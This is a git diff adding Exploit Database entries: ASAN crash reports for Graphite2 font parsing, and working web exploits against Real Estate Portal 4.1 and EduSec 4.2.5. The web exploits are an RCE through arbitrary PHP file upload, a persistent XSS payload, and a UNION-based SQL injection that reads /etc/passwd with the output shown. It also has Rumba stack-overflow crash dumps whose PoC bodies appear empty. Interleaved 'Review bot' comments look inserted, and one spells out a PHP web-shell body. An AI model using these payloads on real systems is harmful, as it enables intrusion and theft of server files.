mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==19167==ABORTING +--- cut --- + +The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254487. Attached are three font files which reproduce the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39862.zip + diff --git a/platforms/multiple/dos/39863.txt b/platforms/multiple/dos/39863.txt new file mode 100755 index 000000000..a675e0086 --- /dev/null +++ b/platforms/multiple/dos/39863.txt 
@@ -0,0 +1,138 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=756 + +We have encountered several different crashes in the graphite2::NameTable::getName method, observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command: + +$ ./gr2fonttest -demand -cache /path/to/file + +Below are three unique ASAN reports that we have triggered. + +--- cut --- +==1191==ERROR: AddressSanitizer: SEGV on unknown address 0x61b000026b15 (pc 0x000000553c81 bp 0x7ffc0e24a820 sp 0x7ffc0e24a800 T0) + #0 0x553c80 in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73 + #1 0x553bd3 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:16 + #2 0x5516cb in unsigned short be::read(unsigned char const*&) graphite/src/./inc/Endian.h:60:23 + #3 0x59192b in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:157:24 + #4 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12 + #5 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8) + #6 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b) + #7 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9) + +AddressSanitizer can not provide additional info. 
+SUMMARY: AddressSanitizer: SEGV graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*) +==1191==ABORTING +--- cut --- + +--- cut --- +==1199==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001fb95 at pc 0x000000553c7d bp 0x7ffdebef2a70 sp 0x7ffdebef2a68 +READ of size 1 at 0x61b00001fb95 thread T0 + #0 0x553c7c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73 + #1 0x553bd3 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:16 + #2 0x5516cb in unsigned short be::read(unsigned char const*&) graphite/src/./inc/Endian.h:60:23 + #3 0x59192b in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:157:24 + #4 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12 + #5 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8) + #6 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b) + #7 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9) + +AddressSanitizer can not describe address in more detail (wild memory access suspected). 
+SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*) +Shadow bytes around the buggy address: + 0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbf40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbf50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbf60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +=>0x0c367fffbf70: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbf80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbf90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbfa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbfb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbfc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==1199==ABORTING +--- cut --- + +--- cut --- +==1315==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000db3a at pc 0x00000057d59d bp 0x7ffd01d33840 sp 0x7ffd01d33838 +READ of size 2 at 0x60400000db3a thread T0 + #0 0x57d59c in graphite2::_utf_codec<16>::get(unsigned short const*, signed char&) graphite/src/./inc/UtfCodec.h:97:27 + #1 0x57d0a7 in graphite2::_utf_iterator::reference::operator unsigned int() const graphite/src/./inc/UtfCodec.h:173:74 + #2 0x591d32 in 
graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:173:18 + #3 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12 + #4 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8) + #5 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b) + #6 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9) + +0x60400000db3a is located 0 bytes to the right of 42-byte region [0x60400000db10,0x60400000db3a) +allocated by thread T0 here: + #0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x55a24a in unsigned short* graphite2::gralloc(unsigned long) graphite/src/./inc/Main.h:88:28 + #2 0x5916ef in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:147:37 + #3 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12 + #4 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8) + #5 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b) + #6 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9) + +SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/UtfCodec.h:97:27 in graphite2::_utf_codec<16>::get(unsigned short const*, signed char&) +Shadow bytes around the buggy address: + 0x0c087fff9b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c087fff9b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c087fff9b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c087fff9b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c087fff9b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +=>0x0c087fff9b60: fa fa 00 00 00 00 00[02]fa fa fd fd fd fd fd fd + 0x0c087fff9b70: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd + 0x0c087fff9b80: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00 + 0x0c087fff9b90: fa fa 
00 00 00 00 00 fa fa fa fd fd fd fd fd fa + 0x0c087fff9ba0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa + 0x0c087fff9bb0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==1315==ABORTING +--- cut --- + +The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254497. Attached are three font files which reproduce the crashes. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39863.zip + diff --git a/platforms/php/webapps/39855.txt b/platforms/php/webapps/39855.txt new file mode 100755 index 000000000..6befccaff --- /dev/null +++ b/platforms/php/webapps/39855.txt 
@@ -0,0 +1,86 @@ +Real Estate Portal v4.1 Remote Code Execution Vulnerability + + +Vendor: NetArt Media +Product web page: http://www.netartmedia.net +Affected version: 4.1 + +Summary: Real Estate Portal is a software written in PHP, +allowing you to launch powerful and professional looking +real estate portals with rich functionalities for the private +sellers, buyers and real estate agents to list properties +for sale or rent, search in the database, show featured +ads and many others. The private sellers can manage their +ads at any time through their personal administration space. + +Desc: Real Estate Portal suffers from an arbitrary file upload +vulnerability leading to an arbitrary PHP code execution. The +vulnerability is caused due to the improper verification of +uploaded files in '/upload.php' script thru the 'myfile' POST +parameter. This can be exploited to execute arbitrary PHP code +by uploading a malicious PHP script file with '.php' extension +that will be stored in the '/uploads' directory. + +Tested on: nginx/1.10.0 + PHP/5.2.17 + MySQL/5.1.66 + + +Vulnerability discovered by Bikramaditya Guha aka "PhoenixX" + @zeroscience + + +Advisory ID: ZSL-2016-5325 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5325.php + + +06.05.2016 + +--- + + +1. 
Arbitrary File Upload: +------------------------- + +Parameter: myfile (POST) +POC URL: http://localhost/uploads/Test.php?cmd=cat%20$%28echo%20L2V0Yy9wYXNzd2Q=%20|%20base64%20-d%29 + +POST /upload.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Referer: http://localhost/USERS/index.php +Content-Length: 419 +Content-Type: multipart/form-data; boundary=---------------------------8914507815764 +Cookie: PHPSESSID=7k4au5p4m0skscj4gjbfedfjs5; AuthU=demo%7Efe01ce2a7fbac8fafaed7c982a04e229%7E1462616214 +Connection: close + +-----------------------------8914507815764 +Content-Disposition: form-data; name="myfile"; filename="Test.php" +Content-Type: image/jpeg + + + +-----------------------------8914507815764 +Content-Disposition: form-data; name="" + +undefined +-----------------------------8914507815764 +Content-Disposition: form-data; name="" + +undefined +-----------------------------8914507815764-- + + + +2. Persistent Cross Site Scripting: +----------------------------------- + +http://localhost/USERS/index.php +Parameters: title, html, headline, size, youtube_id, address, latitude, longitude, user_first_name, user_last_name, agency, user_phone, user_email, website (POST) +Payload: " onmousemove=alert(1) \ No newline at end of file diff --git a/platforms/php/webapps/39856.txt b/platforms/php/webapps/39856.txt new file mode 100755 index 000000000..c5e293112 --- /dev/null +++ b/platforms/php/webapps/39856.txt 
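Review bot: The `myfile` part in the captured POST (`filename="Test.php"`, `Content-Type: image/jpeg`) has an empty body, so the request as printed uploads a zero-byte file; the PoC URL `uploads/Test.php?cmd=...` implies a body such as `<?php system($_GET['cmd']); ?>` was sent, and it should appear in the request so the chain is reproducible. The request also carries `AuthU=demo~...` and `Referer: /USERS/index.php`, which suggests `/upload.php` is reached from the logged-in private-seller area; if so the summary should say a registered account is required rather than presenting this as unauthenticated RCE. A remediation line would help practitioners: allow-list extensions and server-side MIME rather than trusting the client `Content-Type`, rename stored files, and deny script execution in `/uploads` (e.g. `location ^~ /uploads/ { ... }` without a PHP handler on the nginx build tested).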
@@ -0,0 +1,78 @@ +EduSec 4.2.5 Multiple SQL Injection Vulnerabilities + + +Vendor: Rudra Softech +Product web page: http://www.rudrasoftech.com +Affected version: 4.2.5 + +Summary: EduSec has a suite of selective modules specifically +tailored to the requirements of education industry. EduSec is +engineered and designed considering wide range of management +functions within the university. With the use of EduSec, staff +can be more accountable as it helps to know the performance of +each department in just few seconds. Almost all departments within +education industry (e. g. admission, administration, time table, +examination, HR, finance etc) can be synchronized and accessed. +EduSec helps to assign the responsibilities to employee staff +and can reduce time wastage and can speed up the administrative +functions. Core functions like admissions, library management, +transport management, students’ attendance in short entire range +of university functions can be well performed by EduSec. + +Desc: EduSec suffers from multiple SQL Injection vulnerabilities. +Input passed via multiple 'id' GET parameters are not properly +sanitised before being returned to the user or used in SQL queries. +This can be exploited to manipulate SQL queries by injecting +arbitrary SQL code. 
+ +Tested on: MySQL/5.5.35-0ubuntu0.12.04.2 + Apache/2.4.12 (Ubuntu) + + +Vulnerability discovered by Bikramaditya Guha aka "PhoenixX" + @zeroscience + + +Advisory ID: ZSL-2016-5326 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5326.php + + +10.05.2016 + +-- + + +Parameter: id (GET) +POC URL: +http://localhost/student/stu-master/view?id=2%20UniOn%20SeleCt%201,load_file%28%27/etc/passwd%27%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--#guardians +http://localhost/employee/emp-master/view?id=20%27 + + +Request: +GET /student/stu-master/view?id=2%20UniOn%20SeleCt%201,load_file(%27/etc/passwd%27),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=r18cpflgekesdn8cam8c8jmf86; _csrf=0f8795c6671d0db724d513142cc81e5d3ca8b83c094b970242fda96899be8148a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22E-TdUjNTZVVugL36t2p-VcoC6MBR4hqq%22%3B%7D; language=32d49278f28c78229de164fe79dc13b6adb3c98af2d133240eb1ffc44771ad3da%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A2%3A%22en%22%3B%7D; isRTL=0fc3d58c320669b52dea022e5a3db09649641bfdd1cbba93929ce2932c57707aa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22isRTL%22%3Bi%3A1%3Bi%3A0%3B%7D +Connection: close + +Response: +HTTP/1.1 200 OK +Date: Fri, 13 May 2016 08:35:05 GMT +Server: Apache/2.4.12 (Ubuntu) +<....snip> + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +. +.. +... +.... +..... +...... \ No newline at end of file diff --git a/platforms/windows/dos/39857.txt b/platforms/windows/dos/39857.txt new file mode 100755 index 000000000..2a6fb461c --- /dev/null +++ b/platforms/windows/dos/39857.txt 
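Review bot: The advisory claims "multiple 'id' GET parameters" but evidence is shown only for `student/stu-master/view?id=`; the second URL (`employee/emp-master/view?id=20%27`) is a bare quote probe with no request/response, so it should either get its own proof or be marked unconfirmed. The successful `load_file('/etc/passwd')` additionally shows the application's MySQL account holds the FILE privilege and `secure_file_priv` is not restricting reads, which is a separate hardening finding worth a sentence. Both requests are sent with a live `PHPSESSID`, so the injection appears to be post-authentication; the text should state which role can reach these views. The `_csrf` and `language` cookies have the shape of Yii signed cookies (`a:2:{i:0;s:5:"_csrf";...}`), in which case the fix on the vendor side is binding the value (`findOne($id)` / `where(['id' => $id])`) instead of interpolating it into the query — to be confirmed against the source.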
@@ -0,0 +1,417 @@ + +Micro Focus Rumba+ v9.4 Multiple Stack Buffer Overflow Vulnerabilities + + +Vendor: Micro Focus +Product web page: https://www.microfocus.com +Affected version: 9.4.4058.0 and 9.4.0 SP0 Patch0 + +Affected products/tools : Rumba Desktop 9.4 + Rumba 9.4 Trace + Rumba 9.4 APPC Configuration + Rumba 9.4 AS400 Communications + Rumba 9.4 AS400 File Transfer + Rumba 9.4 Communication Monitor + Rumba 9.4 Engine + Rumba 9.4 Screen Designer + Rumba 9.4 Submit Remote Command ;] + Rumba FTP Client 4.5 + +Summary: Rumba is a terminal emulation solution with UI (User Interface) +modernization properties. Rumba and Rumba+ allows users to connect to +so-called 'legacy systems' (typically a mainframe) via desktop, web and +mobile. + +Desc: Rumba+ software package suffers from multiple stack buffer overflow +vulnerabilities when parsing large amount of bytes to several functions in +several OLE controls. An attacker can gain access to the system of the affected +node and execute arbitrary code. + +Tested on: Microsoft Windows 7 Ultimate SP1 (EN) + Microsoft Windows 7 Professional SP1 (EN) + Microsoft Windows 7 Enterprise SP1 (EN) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5327 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5327.php + + +03.02.2016 + +-- + + +---------------------------- +1. MacroName (WdMacCtl.ocx): +---------------------------- + + + + + + +=== + +(1d78.52c): Access violation - code c0000005 (!!! second chance !!!) +*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for C:\Windows\SysWOW64\ntdll.dll - +eax=00000000 ebx=45454545 ecx=74d72a9c edx=42424242 esi=0032ddc0 edi=00000000 +eip=770a15fe esp=0032dd58 ebp=0032ddac iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 +ntdll!NtRaiseException+0x12: +770a15fe 83c404 add esp,4 +0:000> !exchain +0032e7cc: 45454545 +Invalid exception stack at 44444444 +0:000> d 0032e7cc +0032e7cc 44 44 44 44 45 45 45 45-43 43 43 43 43 43 43 43 DDDDEEEECCCCCCCC +0032e7dc 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC +0032e7ec 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC +0032e7fc 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC +0032e80c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC +0032e81c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC +0032e82c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC +0032e83c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC +0:000> kb +ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. 
+0032ddac 77147415 0032ddc0 0032de10 00000000 ntdll!NtRaiseException+0x12 +0032e0e0 7711071a 45454545 fffffffe fffffffe ntdll!RtlRemoteCall+0x236 +0032e130 770db3f5 45454545 0000004d 0032e82c ntdll!RtlUlonglongByteSwap+0x1327a +0032e1b0 77090133 0032e1c8 0032e218 0032e1c8 ntdll!LdrRemoveLoadAsDataTable+0xcac +0032e7b0 41414141 42424242 43434343 43434343 ntdll!KiUserExceptionDispatcher+0xf +0032e7b4 42424242 43434343 43434343 43434343 0x41414141 +0032e7b8 43434343 43434343 43434343 43434343 0x42424242 +0032e7bc 43434343 43434343 43434343 44444444 0x43434343 +0032e7c0 43434343 43434343 44444444 45454545 0x43434343 +0032e7c4 43434343 44444444 45454545 43434343 0x43434343 +0032e7c8 44444444 45454545 43434343 43434343 0x43434343 +0032e7cc 45454545 43434343 43434343 43434343 0x44444444 +0032e7d0 43434343 43434343 43434343 43434343 0x45454545 +0032e7d4 43434343 43434343 43434343 43434343 0x43434343 +0032e7d8 43434343 43434343 43434343 43434343 0x43434343 +0032e7dc 43434343 43434343 43434343 43434343 0x43434343 + + +----------------------------- +2. NetworkName (iconfig.dll): +----------------------------- + + + + + + +=== + +STATUS_STACK_BUFFER_OVERRUN encountered +(2958.3e0): Break instruction exception - code 80000003 (first chance) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\kernel32.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\MSVCR120.dll - +eax=00000000 ebx=616c4480 ecx=76280484 edx=003ee021 esi=00000000 edi=003ee794 +eip=76280265 esp=003ee268 ebp=003ee2e4 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 +kernel32!GetProfileStringW+0x12cc9: +76280265 cc int 3 +.. 
+0:000> d esp+400 +003ee668 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +003ee678 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +003ee688 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +003ee698 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +003ee6a8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +003ee6b8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +003ee6c8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +003ee6d8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +0:000> u +kernel32!GetProfileStringW+0x12cc9: +76280265 cc int 3 +76280266 c745fcfeffffff mov dword ptr [ebp-4],0FFFFFFFEh +7628026d e9c574feff jmp kernel32!UnhandledExceptionFilter+0x40 (76267737) +76280272 33c0 xor eax,eax +76280274 40 inc eax +76280275 c3 ret +76280276 8b65e8 mov esp,dword ptr [ebp-18h] +76280279 68090400c0 push 0C0000409h +0:000> dds +003ee6e8 42424242 +003ee6ec 42424242 +003ee6f0 42424242 +003ee6f4 42424242 +003ee6f8 42424242 +003ee6fc 42424242 +003ee700 42424242 +003ee704 42424242 +003ee708 42424242 +003ee70c 42424242 +003ee710 42424242 +003ee714 42424242 +003ee718 42424242 +003ee71c 42424242 +003ee720 42424242 +003ee724 42424242 +003ee728 42424242 +003ee72c 42424242 +003ee730 42424242 +003ee734 42424242 +003ee738 42424242 +003ee73c 42424242 +003ee740 1e4cd74b +003ee744 003ec760 +003ee748 7594d140 OLEAUT32!DispCallFunc+0xa6 +003ee74c 006a191c +003ee750 02f50024 +003ee754 006a1a7c +003ee758 001df530 +003ee75c 003ee754 +003ee760 003ee7f0 +003ee764 7594cfba OLEAUT32!VarCmp+0xd35 + + +------------------------ +3. CPName (iconfig.dll): +------------------------ + + + + + + + +------------------------------ +4. PrinterName (ProfEdit.dll): +------------------------------ + + + + + + +=== + +(23f4.4c2c): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. 
+This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll - +eax=baadf00d ebx=5fab4b10 ecx=baadf00d edx=003857b8 esi=0030e7b8 edi=0030e66c +eip=5fa63a60 esp=0030e5fc ebp=0030e604 iopl=0 nv up ei pl nz ac pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 +ProfEdit+0x13a60: +5fa63a60 c6808401000000 mov byte ptr [eax+184h],0 ds:002b:baadf191=?? + + +---------------------- +5. Data (FtxBIFF.dll): +---------------------- + + + + + + +=== + +(1164.1dd4): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RUMBA\AS400\FtxBIFF.dll - +eax=00000000 ebx=56c0a928 ecx=757bd0c4 edx=fffff000 esi=baadf00d edi=0036eba8 +eip=56bf3011 esp=0033ddc8 ebp=0033ddd4 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +FtxBIFF+0x3011: +56bf3011 837e2020 cmp dword ptr [esi+20h],20h ds:002b:baadf02d=???????? +0:000> d esp +0033ddc8 f0 dd 33 00 0d f0 ad ba-0d f0 ad ba 48 eb 36 00 ..3.........H.6. +0033ddd8 2c 83 bf 56 02 00 00 00-03 00 00 00 00 00 00 00 ,..V............ +0033dde8 f0 dd 33 00 40 eb 36 00-41 41 41 41 41 41 41 41 ..3.@.6.AAAAAAAA +0033ddf8 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +0033de08 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +0033de18 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +0033de28 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +0033de38 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + + +----------------------------------- +6. 
Serialized (NMSecComParams.dll): +----------------------------------- + + + + + + +=== + +(1508.1a9c): Stack overflow - code c00000fd (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\OLEAUT32.dll - +eax=00362000 ebx=1003efa0 ecx=001d369c edx=0045e600 esi=0045e8b0 edi=0045e6d4 +eip=100366b7 esp=0045e640 ebp=0045e684 iopl=0 nv up ei pl nz na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +NMSecComParams!DllUnregisterServer+0x4617: +100366b7 8500 test dword ptr [eax],eax ds:002b:00362000=00000000 + + +--------------------------------- +7. UserName (NMSecComParams.dll): +--------------------------------- + + + + + + +=== + +(1620.16bc): Stack overflow - code c00000fd (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\OLEAUT32.dll - +eax=000d2000 ebx=1003edd0 ecx=00000000 edx=003e390a esi=001ceba8 edi=001cea5c +eip=100366b7 esp=001ce9e4 ebp=001cea0c iopl=0 nv up ei pl nz na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +NMSecComParams!DllUnregisterServer+0x4617: +100366b7 8500 test dword ptr [eax],eax ds:002b:000d2000=00000000 + + +------------------------- +8. LUName (ProfEdit.dll): +------------------------- + + + + + + +=== + +(f10.1cb8): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. 
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll - +eax=baadf00d ebx=55944ba4 ecx=baadf00d edx=005c32b0 esi=0022e738 edi=0022e5ec +eip=558f3a60 esp=0022e578 ebp=0022e580 iopl=0 nv up ei pl nz ac pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 +ProfEdit+0x13a60: +558f3a60 c6808401000000 mov byte ptr [eax+184h],0 ds:002b:baadf191=?? + + +------------------------- +9. newVal (FTPSFtp.dll): +------------------------- + + + + + + +=== + +STATUS_STACK_BUFFER_OVERRUN encountered +(608.f74): Break instruction exception - code 80000003 (first chance) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\kernel32.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SysWOW64\MSVCR120.dll - +eax=00000000 ebx=10027e44 ecx=757d047c edx=0039dc45 esi=00000000 edi=0039e594 +eip=757d025d esp=0039de8c ebp=0039df08 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 +kernel32!GetProfileStringW+0x12cc1: +757d025d cc int 3 + + +---------------------- +10. Host (FTP Client): +---------------------- + +For the RUMBA FTP Client PoC, copy ~300 bytes array and paste it in the Host field when creating a new session. + diff --git a/platforms/windows/remote/39858.py b/platforms/windows/remote/39858.py new file mode 100755 index 000000000..47ca6cdaf --- /dev/null +++ b/platforms/windows/remote/39858.py 
